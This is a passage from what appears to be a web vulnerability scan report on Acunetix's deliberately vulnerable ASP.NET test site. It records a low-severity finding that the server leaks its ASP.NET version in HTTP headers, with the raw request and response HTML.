          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top" align="center">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm">
          							<TR>
          								<TD>Username:</TD>
          								<TD align="right">
          									<input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD align="right">
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" />
          									Remember me
          								</TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        9. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 22687
          
          
          Response body (22687 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKP1p3RBAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/M3rUCxcfpdy3AdSqGMGh3aLpuYg==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" 